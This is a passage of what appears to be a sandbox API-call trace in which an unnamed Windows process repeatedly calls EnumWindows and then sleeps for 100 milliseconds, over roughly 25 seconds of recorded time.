[0105.748] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0105.748] Sleep (dwMilliseconds=0x64) [0105.891] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0105.892] Sleep (dwMilliseconds=0x64) [0106.298] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0106.301] Sleep (dwMilliseconds=0x64) [0106.650] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0106.650] Sleep (dwMilliseconds=0x64) [0106.978] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0106.978] Sleep (dwMilliseconds=0x64) [0107.091] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0107.092] Sleep (dwMilliseconds=0x64) [0107.488] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0107.488] Sleep (dwMilliseconds=0x64) [0107.614] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0107.614] Sleep (dwMilliseconds=0x64) [0107.816] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0107.817] Sleep (dwMilliseconds=0x64) [0107.927] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0107.927] Sleep (dwMilliseconds=0x64) [0108.176] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0108.176] Sleep (dwMilliseconds=0x64) [0108.317] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0108.318] Sleep (dwMilliseconds=0x64) [0108.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0108.481] Sleep (dwMilliseconds=0x64) [0108.660] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0108.660] Sleep (dwMilliseconds=0x64) [0108.850] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0108.850] Sleep (dwMilliseconds=0x64) [0108.968] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0108.968] Sleep (dwMilliseconds=0x64) [0109.122] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0109.123] Sleep (dwMilliseconds=0x64) [0109.260] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0109.261] Sleep (dwMilliseconds=0x64) [0109.364] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0109.364] Sleep (dwMilliseconds=0x64) [0109.644] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0109.645] Sleep (dwMilliseconds=0x64) [0109.755] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0109.755] Sleep (dwMilliseconds=0x64) [0109.940] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0109.941] Sleep (dwMilliseconds=0x64) [0110.083] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0110.084] Sleep (dwMilliseconds=0x64) [0110.209] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0110.210] Sleep (dwMilliseconds=0x64) [0110.484] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0110.485] Sleep (dwMilliseconds=0x64) [0110.608] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0110.609] Sleep (dwMilliseconds=0x64) [0110.781] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0110.782] Sleep (dwMilliseconds=0x64) [0110.938] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0110.938] Sleep (dwMilliseconds=0x64) [0111.092] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0111.092] Sleep (dwMilliseconds=0x64) [0111.217] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0111.218] Sleep (dwMilliseconds=0x64) [0111.328] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0111.328] Sleep (dwMilliseconds=0x64) [0111.656] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0111.656] Sleep (dwMilliseconds=0x64) [0111.766] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0111.766] Sleep (dwMilliseconds=0x64) [0111.902] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0111.903] Sleep (dwMilliseconds=0x64) [0112.038] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0112.038] Sleep (dwMilliseconds=0x64) [0112.141] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0112.141] Sleep (dwMilliseconds=0x64) [0112.249] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0112.249] Sleep (dwMilliseconds=0x64) [0112.395] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0112.395] Sleep (dwMilliseconds=0x64) [0112.508] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0112.508] Sleep (dwMilliseconds=0x64) [0112.634] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0112.634] Sleep (dwMilliseconds=0x64) [0112.819] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0112.819] Sleep (dwMilliseconds=0x64) [0112.931] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0112.931] Sleep (dwMilliseconds=0x64) [0113.040] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0113.040] Sleep (dwMilliseconds=0x64) [0113.149] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0113.150] Sleep (dwMilliseconds=0x64) [0113.267] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0113.267] Sleep (dwMilliseconds=0x64) [0113.398] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0113.398] Sleep (dwMilliseconds=0x64) [0113.508] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0113.508] Sleep (dwMilliseconds=0x64) [0113.641] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0113.642] Sleep (dwMilliseconds=0x64) [0113.789] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0113.790] Sleep (dwMilliseconds=0x64) [0113.899] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0113.899] Sleep (dwMilliseconds=0x64) [0114.070] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0114.070] Sleep (dwMilliseconds=0x64) [0114.211] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0114.211] Sleep (dwMilliseconds=0x64) [0114.338] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0114.338] Sleep (dwMilliseconds=0x64) [0114.445] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0114.446] Sleep (dwMilliseconds=0x64) [0114.555] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0114.555] Sleep (dwMilliseconds=0x64) [0114.680] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0114.680] Sleep (dwMilliseconds=0x64) [0114.796] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0114.797] Sleep (dwMilliseconds=0x64) [0114.948] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0114.949] Sleep (dwMilliseconds=0x64) [0115.055] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0115.056] Sleep (dwMilliseconds=0x64) [0115.206] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0115.206] Sleep (dwMilliseconds=0x64) [0115.321] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0115.321] Sleep (dwMilliseconds=0x64) [0115.434] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0115.434] Sleep (dwMilliseconds=0x64) [0115.545] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0115.545] Sleep (dwMilliseconds=0x64) [0115.660] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0115.661] Sleep (dwMilliseconds=0x64) [0115.812] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0115.812] Sleep (dwMilliseconds=0x64) [0115.922] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0115.922] Sleep (dwMilliseconds=0x64) [0116.049] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0116.050] Sleep (dwMilliseconds=0x64) [0116.167] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0116.168] Sleep (dwMilliseconds=0x64) [0116.280] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0116.280] Sleep (dwMilliseconds=0x64) [0116.404] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0116.404] Sleep (dwMilliseconds=0x64) [0116.511] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0116.512] Sleep (dwMilliseconds=0x64) [0116.635] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0116.635] Sleep (dwMilliseconds=0x64) [0116.746] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0116.747] Sleep (dwMilliseconds=0x64) [0116.856] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0116.857] Sleep (dwMilliseconds=0x64) [0116.996] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0116.996] Sleep (dwMilliseconds=0x64) [0117.106] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0117.107] Sleep (dwMilliseconds=0x64) [0117.214] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0117.214] Sleep (dwMilliseconds=0x64) [0117.460] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0117.461] Sleep (dwMilliseconds=0x64) [0117.606] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0117.606] Sleep (dwMilliseconds=0x64) [0117.717] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0117.718] Sleep (dwMilliseconds=0x64) [0117.830] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0117.830] Sleep (dwMilliseconds=0x64) [0117.938] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0117.938] Sleep (dwMilliseconds=0x64) [0118.042] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0118.042] Sleep (dwMilliseconds=0x64) [0118.167] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0118.167] Sleep (dwMilliseconds=0x64) [0118.277] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0118.277] Sleep (dwMilliseconds=0x64) [0118.386] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0118.387] Sleep (dwMilliseconds=0x64) [0118.495] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0118.496] Sleep (dwMilliseconds=0x64) [0118.605] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0118.605] Sleep (dwMilliseconds=0x64) [0118.746] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0118.746] Sleep (dwMilliseconds=0x64) [0118.855] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0118.856] Sleep (dwMilliseconds=0x64) [0119.015] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0119.015] Sleep (dwMilliseconds=0x64) [0119.167] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0119.168] Sleep (dwMilliseconds=0x64) [0119.280] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0119.280] Sleep (dwMilliseconds=0x64) [0119.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0119.404] Sleep (dwMilliseconds=0x64) [0119.512] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0119.512] Sleep (dwMilliseconds=0x64) [0119.633] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0119.634] Sleep (dwMilliseconds=0x64) [0119.781] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0119.781] Sleep (dwMilliseconds=0x64) [0119.886] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0119.886] Sleep (dwMilliseconds=0x64) [0120.022] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0120.023] Sleep (dwMilliseconds=0x64) [0120.136] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0120.136] Sleep (dwMilliseconds=0x64) [0120.245] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0120.245] Sleep (dwMilliseconds=0x64) [0120.380] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0120.381] Sleep (dwMilliseconds=0x64) [0120.494] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0120.494] Sleep (dwMilliseconds=0x64) [0120.615] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0120.616] Sleep (dwMilliseconds=0x64) [0120.728] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0120.728] Sleep (dwMilliseconds=0x64) [0120.841] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0120.842] Sleep (dwMilliseconds=0x64) [0120.947] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0120.947] Sleep (dwMilliseconds=0x64) [0121.091] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0121.092] Sleep (dwMilliseconds=0x64) [0121.196] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0121.196] Sleep (dwMilliseconds=0x64) [0121.333] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0121.334] Sleep (dwMilliseconds=0x64) [0121.478] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0121.478] Sleep (dwMilliseconds=0x64) [0121.580] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0121.581] Sleep (dwMilliseconds=0x64) [0121.739] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0121.740] Sleep (dwMilliseconds=0x64) [0121.899] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0121.900] Sleep (dwMilliseconds=0x64) [0122.011] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0122.012] Sleep (dwMilliseconds=0x64) [0122.307] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0122.308] Sleep (dwMilliseconds=0x64) [0122.415] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0122.416] Sleep (dwMilliseconds=0x64) [0122.529] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0122.530] Sleep (dwMilliseconds=0x64) [0122.634] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0122.635] Sleep (dwMilliseconds=0x64) [0122.744] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0122.745] Sleep (dwMilliseconds=0x64) [0122.888] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0122.889] Sleep (dwMilliseconds=0x64) [0122.995] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0122.995] Sleep (dwMilliseconds=0x64) [0123.113] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0123.113] Sleep (dwMilliseconds=0x64) [0123.369] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0123.369] Sleep (dwMilliseconds=0x64) [0123.479] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0123.480] Sleep (dwMilliseconds=0x64) [0123.626] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0123.627] Sleep (dwMilliseconds=0x64) [0123.727] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0123.728] Sleep (dwMilliseconds=0x64) [0123.839] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0123.839] Sleep (dwMilliseconds=0x64) [0123.946] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0123.947] Sleep (dwMilliseconds=0x64) [0124.065] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0124.065] Sleep (dwMilliseconds=0x64) [0124.213] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0124.213] Sleep (dwMilliseconds=0x64) [0124.321] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0124.322] Sleep (dwMilliseconds=0x64) [0124.431] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0124.431] Sleep (dwMilliseconds=0x64) [0124.541] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0124.542] Sleep (dwMilliseconds=0x64) [0124.649] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0124.650] Sleep (dwMilliseconds=0x64) [0124.759] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0124.760] Sleep (dwMilliseconds=0x64) [0124.876] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0124.876] Sleep (dwMilliseconds=0x64) [0125.041] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0125.042] Sleep (dwMilliseconds=0x64) [0125.149] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0125.150] Sleep (dwMilliseconds=0x64) [0125.259] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0125.260] Sleep (dwMilliseconds=0x64) [0125.371] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0125.371] Sleep (dwMilliseconds=0x64) [0125.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0125.481] Sleep (dwMilliseconds=0x64) [0125.627] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0125.627] Sleep (dwMilliseconds=0x64) [0125.733] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0125.734] Sleep (dwMilliseconds=0x64) [0125.941] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0125.941] Sleep (dwMilliseconds=0x64) [0126.044] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0126.044] Sleep (dwMilliseconds=0x64) [0126.156] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0126.157] Sleep (dwMilliseconds=0x64) [0126.262] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0126.262] Sleep (dwMilliseconds=0x64) [0126.371] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0126.372] Sleep (dwMilliseconds=0x64) [0126.508] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0126.508] Sleep (dwMilliseconds=0x64) [0126.629] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0126.629] Sleep (dwMilliseconds=0x64) [0126.735] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0126.736] Sleep (dwMilliseconds=0x64) [0126.863] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0126.863] Sleep (dwMilliseconds=0x64) [0126.875] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0126.875] Sleep (dwMilliseconds=0x64) [0126.889] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0126.890] Sleep (dwMilliseconds=0x64) [0126.933] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0126.934] Sleep (dwMilliseconds=0x64) [0126.981] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0126.982] Sleep (dwMilliseconds=0x64) [0126.997] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0126.997] Sleep (dwMilliseconds=0x64) [0127.013] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.014] Sleep (dwMilliseconds=0x64) [0127.040] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.040] Sleep (dwMilliseconds=0x64) [0127.043] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.043] Sleep (dwMilliseconds=0x64) [0127.063] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.063] Sleep (dwMilliseconds=0x64) [0127.078] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.078] Sleep (dwMilliseconds=0x64) [0127.144] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.144] Sleep (dwMilliseconds=0x64) [0127.195] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.196] Sleep (dwMilliseconds=0x64) [0127.222] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.222] Sleep (dwMilliseconds=0x64) [0127.233] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.233] Sleep (dwMilliseconds=0x64) [0127.246] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.247] Sleep (dwMilliseconds=0x64) [0127.265] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.266] Sleep (dwMilliseconds=0x64) [0127.278] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.278] Sleep (dwMilliseconds=0x64) [0127.293] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.294] Sleep (dwMilliseconds=0x64) [0127.310] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.311] Sleep (dwMilliseconds=0x64) [0127.365] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.366] Sleep (dwMilliseconds=0x64) [0127.409] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.410] Sleep (dwMilliseconds=0x64) [0127.418] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.419] Sleep (dwMilliseconds=0x64) [0127.434] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.434] Sleep (dwMilliseconds=0x64) [0127.450] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.450] Sleep (dwMilliseconds=0x64) [0127.466] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.467] Sleep (dwMilliseconds=0x64) [0127.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.482] Sleep (dwMilliseconds=0x64) [0127.497] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.497] Sleep (dwMilliseconds=0x64) [0127.513] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.513] Sleep (dwMilliseconds=0x64) [0127.528] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.528] Sleep (dwMilliseconds=0x64) [0127.575] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.576] Sleep (dwMilliseconds=0x64) [0127.636] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.637] Sleep (dwMilliseconds=0x64) [0127.654] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.654] Sleep (dwMilliseconds=0x64) [0127.670] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.670] Sleep (dwMilliseconds=0x64) [0127.688] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.688] Sleep (dwMilliseconds=0x64) [0127.710] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.710] Sleep (dwMilliseconds=0x64) [0127.725] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.725] Sleep (dwMilliseconds=0x64) [0127.766] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.769] Sleep (dwMilliseconds=0x64) [0127.814] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.815] Sleep (dwMilliseconds=0x64) [0127.856] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.859] Sleep (dwMilliseconds=0x64) [0127.901] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.902] Sleep (dwMilliseconds=0x64) [0127.921] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.922] Sleep (dwMilliseconds=0x64) [0127.934] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.934] Sleep (dwMilliseconds=0x64) [0127.950] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0127.951] Sleep (dwMilliseconds=0x64) [0128.003] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0128.004] Sleep (dwMilliseconds=0x64) [0128.130] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0128.131] Sleep (dwMilliseconds=0x64) [0128.742] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0128.743] Sleep (dwMilliseconds=0x64) [0128.824] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0128.825] Sleep (dwMilliseconds=0x64) [0128.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0128.904] Sleep (dwMilliseconds=0x64) [0128.947] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0128.948] Sleep (dwMilliseconds=0x64) [0128.967] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0128.970] Sleep (dwMilliseconds=0x64) [0128.983] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0128.983] Sleep (dwMilliseconds=0x64) [0129.011] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.014] Sleep (dwMilliseconds=0x64) [0129.057] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.058] Sleep (dwMilliseconds=0x64) [0129.108] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.108] Sleep (dwMilliseconds=0x64) [0129.131] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.132] Sleep (dwMilliseconds=0x64) [0129.137] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.137] Sleep (dwMilliseconds=0x64) [0129.156] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.157] Sleep (dwMilliseconds=0x64) [0129.285] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.286] Sleep (dwMilliseconds=0x64) [0129.343] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.344] Sleep (dwMilliseconds=0x64) [0129.391] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.391] Sleep (dwMilliseconds=0x64) [0129.405] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.406] Sleep (dwMilliseconds=0x64) [0129.418] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.419] Sleep (dwMilliseconds=0x64) [0129.439] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.440] Sleep (dwMilliseconds=0x64) [0129.450] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.450] Sleep (dwMilliseconds=0x64) [0129.504] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.505] Sleep (dwMilliseconds=0x64) [0129.543] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.544] Sleep (dwMilliseconds=0x64) [0129.590] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.591] Sleep (dwMilliseconds=0x64) [0129.619] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.620] Sleep (dwMilliseconds=0x64) [0129.638] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.638] Sleep (dwMilliseconds=0x64) [0129.655] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.656] Sleep (dwMilliseconds=0x64) [0129.668] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.669] Sleep (dwMilliseconds=0x64) [0129.684] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.685] Sleep (dwMilliseconds=0x64) [0129.700] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.700] Sleep (dwMilliseconds=0x64) [0129.716] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.716] Sleep (dwMilliseconds=0x64) [0129.782] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.782] Sleep (dwMilliseconds=0x64) [0129.828] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.828] Sleep (dwMilliseconds=0x64) [0129.840] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.844] Sleep (dwMilliseconds=0x64) [0129.856] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.856] Sleep (dwMilliseconds=0x64) [0129.872] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.873] Sleep (dwMilliseconds=0x64) [0129.889] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.890] Sleep (dwMilliseconds=0x64) [0129.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.903] Sleep (dwMilliseconds=0x64) [0129.922] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.923] Sleep (dwMilliseconds=0x64) [0129.935] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.935] Sleep (dwMilliseconds=0x64) [0129.999] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0129.999] Sleep (dwMilliseconds=0x64) [0130.051] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.051] Sleep (dwMilliseconds=0x64) [0130.079] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.080] Sleep (dwMilliseconds=0x64) [0130.090] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.091] Sleep (dwMilliseconds=0x64) [0130.107] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.107] Sleep (dwMilliseconds=0x64) [0130.123] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.123] Sleep 